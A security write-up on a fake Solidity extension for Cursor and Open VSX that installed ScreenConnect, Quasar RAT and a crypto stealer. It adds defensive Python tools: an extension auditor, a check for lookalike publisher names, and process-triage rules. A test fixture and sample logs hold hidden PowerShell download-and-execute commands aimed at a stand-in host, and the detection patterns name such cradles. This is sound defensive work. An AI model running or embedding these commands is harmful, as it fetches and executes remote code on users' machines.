Malicious Open VSX Extension Used in $500K Crypto Heist
A deep dive into one of 2025’s most sophisticated open-source supply chain attacks
A malicious extension hosted on the Open VSX marketplace was used to steal $500,000 in cryptocurrency from a security-conscious developer. Disguised as a harmless Solidity syntax highlighter, the extension was quietly downloaded, activated, and used to gain remote access, steal credentials, and drain wallets.
Although the plugin has since been removed, the attackers have already begun uploading new variants—a troubling sign for the open-source ecosystem.
How the Scam Worked
The attackers deployed multiple strategies to make the extension appear legitimate:
Fake Popularity: Inflated download numbers to boost credibility
Search Manipulation: Used Open VSX’s ranking algorithm to appear above genuine tools
Rapid Re-Uploads: As soon as one plugin was taken down, clones were reuploaded under new names
Key Takeaway: Even in trusted developer ecosystems, malware can hide in plain sight. Verifying every extension before installation is no longer optional—it's essential.
The $500K Scam Hidden in a Code Highlighter
Malicious Open-Source Packages: A Growing Threat
Attacks leveraging public package repositories like npm, PyPI, and now Open VSX are on the rise. Despite heightened awareness and researcher vigilance, attackers continue to profit by exploiting open-source trust models.
Timeline of the Attack
June 2025
A Russian blockchain developer reached out to investigators after losing half a million dollars in cryptocurrency. The case was unusual:
The operating system had been freshly installed
Only trusted, widely used software had been downloaded
The developer was highly cautious with transactions
A full disk image was captured for forensic review
Discovery: Malware Masquerading as a Solidity Extension
The forensic analysis revealed a malicious file:
%userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.js
This script fetched and executed a PowerShell payload from angelic[.]su, which is clear evidence of malware.
The Fake Plugin in Cursor AI
The infected extension was a fake Solidity language support plugin on Open VSX, posing as a legitimate tool for Cursor AI (an AI-enhanced IDE built on VS Code).
What it claimed:
Syntax highlighting for Solidity smart contracts
Code optimization features
What it actually did:
Contained zero functional code
Copied its description from a legitimate plugin
Served only one purpose: download and execute malware
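The "zero functional code" point is checkable offline: a genuine language extension declares languages or grammars in its package.json, while a dropper ships an activation script that spawns a shell and fetches remote code. The following is an added example, not tooling from the report or from Open VSX; the indicator patterns, the publisher names, the directory layout and the `example.invalid` host in the constructed fixture are assumptions made for illustration. It walks an extensions directory, reads each package.json and the script named in its "main" field, and returns a verdict per extension.

```python
"""Static audit of installed VS Code / Cursor extensions for
download-and-execute activation code.
Added example, not tooling from the report or from Open VSX."""
import json
import os
import re
import tempfile

# Extension roots to walk by default (Cursor and VS Code).
DEFAULT_ROOTS = [
    os.path.expanduser("~/.cursor/extensions"),
    os.path.expanduser("~/.vscode/extensions"),
]

# Indicators that an activation script downloads and runs code instead of
# providing editor features.  Illustrative patterns, not a published rule.
INDICATORS = {
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)"""),
    "powershell": re.compile(r"powershell(\.exe)?", re.I),
    "hidden_or_bypass": re.compile(
        r"-(WindowStyle\s+Hidden|ExecutionPolicy\s+Bypass|w\s+hidden|ep\s+bypass)", re.I),
    "download_cradle": re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\birm\b|"
        r"Invoke-Expression|\biex\b|Net\.WebClient)", re.I),
    "remote_script_url": re.compile(r"""https?://[^\s'"]+\.(txt|ps1|vbs)\b""", re.I),
}


def audit_extension(ext_dir):
    """Audit one extension directory; return None if it has no package.json."""
    pkg_path = os.path.join(ext_dir, "package.json")
    if not os.path.isfile(pkg_path):
        return None
    with open(pkg_path, encoding="utf-8") as f:
        pkg = json.load(f)
    contributes = pkg.get("contributes") or {}
    has_grammar = bool(contributes.get("grammars") or contributes.get("languages"))
    hits = []
    main = pkg.get("main")
    if main:
        main_path = os.path.normpath(os.path.join(ext_dir, main))
        if not os.path.isfile(main_path) and os.path.isfile(main_path + ".js"):
            main_path += ".js"  # "main" may omit the file extension
        if os.path.isfile(main_path):
            with open(main_path, encoding="utf-8", errors="replace") as f:
                src = f.read()
            hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    if "child_process" in hits and ("powershell" in hits or "remote_script_url" in hits):
        verdict = "malicious-looking"  # spawns a shell to fetch/run remote code
    elif hits:
        verdict = "review"
    elif main and not contributes:
        verdict = "review"             # runs code but contributes nothing to the editor
    else:
        verdict = "clean"
    return {"dir": os.path.basename(ext_dir), "publisher": pkg.get("publisher"),
            "name": pkg.get("name"), "has_grammar": has_grammar,
            "hits": hits, "verdict": verdict}


def audit_all(root):
    """Audit every extension directory directly under root."""
    results = []
    if not os.path.isdir(root):
        return results
    for entry in sorted(os.listdir(root)):
        r = audit_extension(os.path.join(root, entry))
        if r:
            results.append(r)
    return results


# Constructed stand-in for a dropper's extension.js; the host is a reserved
# example name, not the real payload server.
FAKE_EXTENSION_JS = r"""
const { exec } = require('child_process');
function activate(context) {
  exec('powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/1.txt\')"');
}
exports.activate = activate;
exports.deactivate = function () {};
"""


def build_sample_tree():
    """Create a constructed extensions directory: one grammar-only extension
    and one dropper laid out like the directory name in the report."""
    root = tempfile.mkdtemp(prefix="ext-audit-")
    legit = os.path.join(root, "juanblanco.solidity-0.0.1")
    os.makedirs(os.path.join(legit, "syntaxes"))
    with open(os.path.join(legit, "package.json"), "w") as f:
        json.dump({"name": "solidity", "publisher": "juanblanco",
                   "contributes": {"languages": [{"id": "solidity"}],
                                   "grammars": [{"language": "solidity",
                                                 "scopeName": "source.solidity",
                                                 "path": "./syntaxes/solidity.json"}]}}, f)
    fake = os.path.join(root, "solidityai.solidity-1.0.9-universal")
    os.makedirs(os.path.join(fake, "src"))
    with open(os.path.join(fake, "package.json"), "w") as f:
        json.dump({"name": "solidity", "publisher": "solidityai",
                   "main": "./src/extension.js"}, f)
    with open(os.path.join(fake, "src", "extension.js"), "w") as f:
        f.write(FAKE_EXTENSION_JS)
    return root


if __name__ == "__main__":
    for root in DEFAULT_ROOTS:
        for r in audit_all(root):
            print(r["verdict"], r["dir"], r["hits"])
```

Run it as-is to audit your own Cursor and VS Code extension folders; an extension that declares no languages, grammars, commands or views yet ships a "main" script deserves a look even when none of the indicator patterns fire.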
How the Victim Got Tricked
The developer searched for "solidity" in Cursor AI’s marketplace. The results:
Malicious extension: Ranked 4th, with 54K downloads
Legitimate extension: Ranked 8th, with 61K downloads
Why?
Open VSX ranks extensions by “relevance,” factoring in:
Download count
Recent updates
Ratings
Verification status
The attackers gamed the system:
Showed a more recent update date (June 15 for the malicious extension vs. May 30 for the legitimate one)
Likely used bots to inflate downloads
When the extension did nothing, the victim assumed it was buggy and left it installed, while the malware ran silently in the background.
Infection Chain: From PowerShell to Full Takeover
Stage 1
The plugin downloaded 1.txt, a PowerShell script, from angelic[.]su and executed it.
Stage 2
If ScreenConnect was not already present, 1.txt downloaded 2.txt, which:
Installed ScreenConnect from lmfao[.]su
Connected it to the C2 server relay.lmfao[.]su
Credential Theft & RAT Deployment
Next, the attackers executed three obfuscated VBS scripts: a.vbs, b.vbs, and m.vbs. These scripts:
Fetched more PowerShell payloads from paste.ee
Downloaded additional malware hidden in image files hosted on archive[.]org
Payloads Deployed:
Quasar RAT: remote access tool, delivered via a.vbs and b.vbs
Credential stealer: targeted crypto wallets, browsers, and email clients, delivered via m.vbs
The stolen credentials led to the theft of $500,000 in digital assets.
The Attackers Rebrand and Relaunch
After the malicious plugin was removed on July 2, 2025, the attackers immediately:
Reuploaded a new extension named "solidity", matching the legitimate extension's name
Faked 2 million downloads to leapfrog the legitimate result
Spoofed the developer name: legitimate juanblanco vs. fake juanbIanco (capital "I" in place of the lowercase "l")
Now, the Cursor AI extension marketplace showed two nearly identical entries—one safe, one malicious.
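A publisher-name swap like juanblanco vs. juanbIanco survives a quick visual check because the glyphs are near-identical in most fonts. The following is an added example of a lookalike check, not code from the report or from Open VSX: it folds common confusable characters into a comparison skeleton and flags a candidate publisher that collides with, or sits one edit away from, a name on a vetted allowlist. The confusable table and the allowlist contents are assumptions for illustration.

```python
"""Publisher-name lookalike check for marketplace listings.
Added example, not code from the report or from Open VSX."""
import re
import unicodedata
from difflib import SequenceMatcher

# Characters and digraphs commonly swapped in to impersonate a name.
# Illustrative subset; Unicode TR39 "skeleton" tables are the full treatment.
CONFUSABLES = [
    ("rn", "m"), ("vv", "w"), ("cl", "d"),            # digraphs first
    ("I", "l"), ("1", "l"), ("|", "l"), ("0", "o"), ("O", "o"),
    ("5", "s"), ("$", "s"), ("3", "e"), ("4", "a"), ("@", "a"),
]


def skeleton(name):
    """Reduce a name to a comparison form: strip accents, fold confusables,
    lower-case, and drop separators, so 'juanbIanco' and 'juanblanco' collide."""
    s = unicodedata.normalize("NFKD", name)
    s = "".join(c for c in s if not unicodedata.combining(c))
    for src, dst in CONFUSABLES:   # fold before lower-casing so 'I' -> 'l' applies
        s = s.replace(src, dst)
    s = s.lower()
    return re.sub(r"[^a-z0-9]", "", s)


def classify(candidate, known_publishers):
    """Return ('exact', name), ('lookalike', name) or ('unknown', None)."""
    if candidate in known_publishers:
        return ("exact", candidate)
    cand = skeleton(candidate)
    skeletons = {k: skeleton(k) for k in known_publishers}
    for k, sk in skeletons.items():
        if cand == sk:
            return ("lookalike", k)
    # Near-misses that survive skeletonisation, e.g. one letter added or dropped.
    for k, sk in skeletons.items():
        if SequenceMatcher(None, cand, sk).ratio() >= 0.9:
            return ("lookalike", k)
    return ("unknown", None)


# Constructed allowlist: publishers you have already vetted.
KNOWN_PUBLISHERS = {"juanblanco"}

if __name__ == "__main__":
    for p in ["juanblanco", "juanbIanco", "juanblanc0", "juan-blanco", "solidityai"]:
        print(p, classify(p, KNOWN_PUBLISHERS))
```

Apply it to the publisher field of every extension you are about to install, not to the display name: the display name "solidity" was identical for both listings in this case, so only the publisher distinguishes them.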
Broader Campaign Discovered
Further investigation uncovered a wider campaign:
npm package solsafe: dropped ScreenConnect via staketree[.]net/1.txt
Other VS Code-style extensions: solaibot, among-eth, blankebesxstnion
All used the same infection and obfuscation techniques
Common Attack Patterns
PowerShell scripts named 1.txt and 2.txt
Obfuscated VBS scripts calling paste.ee
Payloads hidden in image files hosted on archive[.]org
Key Takeaways & Defense Tips
1. Verify Before You Trust
Check developer names closely
Review update dates and download spikes
If a plugin doesn’t work—inspect its code
2. Use Real Security Tools
Quasar RAT and the stealer are well-known malware families; endpoint protection with current signatures would very likely have detected them
3. Watch for Suspicious Activity
Monitor for PowerShell processes spawned from your editor or its extension host, for download cradles in PowerShell command lines, and for ScreenConnect installs your IT team did not approve
4. Assume Repositories Can Be Dangerous
Open VSX, npm, PyPI, and others are frequent targets
Don't assume trust just because it’s open source
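The chain above leaves a distinctive process tree on the endpoint: the editor (or its extension host) spawns a shell, the shell spawns PowerShell with a download cradle, PowerShell drops VBS scripts into a user-writable directory, and a ScreenConnect client service appears. The following is an added example of triage logic over process-creation telemetry, not a rule from the report or from any vendor. The events are constructed in the shape of Sysmon Event ID 1 / EDR process-start records; the paths, PIDs, the `example.invalid` hosts and the rule names are assumptions for illustration.

```python
"""Process-creation triage for editor-spawned download cradles, ScreenConnect
clients and VBS launched from user-writable paths.
Added example, not a rule from the report or a vendor."""
import ntpath
import re

IDE_IMAGES = {"cursor.exe", "code.exe", "code - insiders.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Download-and-execute tokens in a PowerShell command line.
CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\birm\b|"
    r"Invoke-Expression|\biex\b|-enc(odedcommand)?\b|FromBase64String)", re.I)
# ScreenConnect client binaries (and the install folder they live in).
SCREENCONNECT = re.compile(
    r"ScreenConnect\.(ClientService|WindowsClient|Client)\.exe$|ScreenConnect Client", re.I)
# A .vbs launched from a user-writable location.
USER_DIR_VBS = re.compile(r'(\\Temp\\|\\AppData\\|\\ProgramData\\)[^\s"]*\.vbs\b', re.I)


def basename(path):
    return ntpath.basename(path).lower()


def ancestors(event, by_pid, max_depth=6):
    """Walk parent pointers so an intermediate cmd.exe does not hide the IDE."""
    chain, cur = [], event
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            break
        chain.append(basename(parent["image"]))
        cur = parent
    return chain


def detect(events):
    """Return (severity, rule, pid) alerts for the events, in event order."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img, cmd = basename(e["image"]), e.get("cmdline", "")
        if img in SHELLS and CRADLE.search(cmd):
            if any(a in IDE_IMAGES for a in ancestors(e, by_pid)):
                alerts.append(("high", "ide_spawned_download_cradle", e["pid"]))
            else:
                alerts.append(("medium", "powershell_download_cradle", e["pid"]))
        if SCREENCONNECT.search(e["image"]):
            alerts.append(("high", "screenconnect_client_running", e["pid"]))
        if img in SCRIPT_HOSTS and USER_DIR_VBS.search(cmd):
            alerts.append(("medium", "vbs_from_user_writable_dir", e["pid"]))
    return alerts


# Constructed telemetry, not captured from the incident.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe",
     "cmdline": "Cursor.exe --type=extensionHost"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /d /s /c "powershell -w hidden -ep bypass -c ..."'},
    {"pid": 220, "ppid": 210, "image": PS,
     "cmdline": "powershell -w hidden -ep bypass -c \"iex ((New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/1.txt'))\""},
    {"pid": 230, "ppid": 220, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\dev\AppData\Local\Temp\m.vbs"'},
    {"pid": 300, "ppid": 4,
     "image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "cmdline": '"ScreenConnect.ClientService.exe" "?e=Access&h=relay.example.invalid&p=443"'},
    {"pid": 400, "ppid": 100, "image": PS,
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\src"},   # benign
    {"pid": 500, "ppid": 100, "image": PS,
     "cmdline": 'powershell -c "irm https://example.invalid/setup.ps1 | iex"'},  # cradle, not from IDE
]

if __name__ == "__main__":
    for sev, rule, pid in detect(SAMPLE_EVENTS):
        print(sev, rule, pid)
```

The ancestor walk is the part worth keeping: `child_process.exec` from an extension goes through cmd.exe, so a rule that only looks at the immediate parent of powershell.exe would miss the editor entirely and downgrade the alert to the generic medium severity.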
Final Thoughts
This incident proves what security professionals have warned for years: Open-source software can be weaponized, even in tools trusted by developers and engineers.
A single fake syntax highlighter cost one developer $500,000. The next victim could be a dev team, an exchange, or a DAO.
Trust nothing. Verify everything.
(Note: Malicious domains such as angelic[.]su, lmfao[.]su, and others are written with brackets so they cannot be opened accidentally.)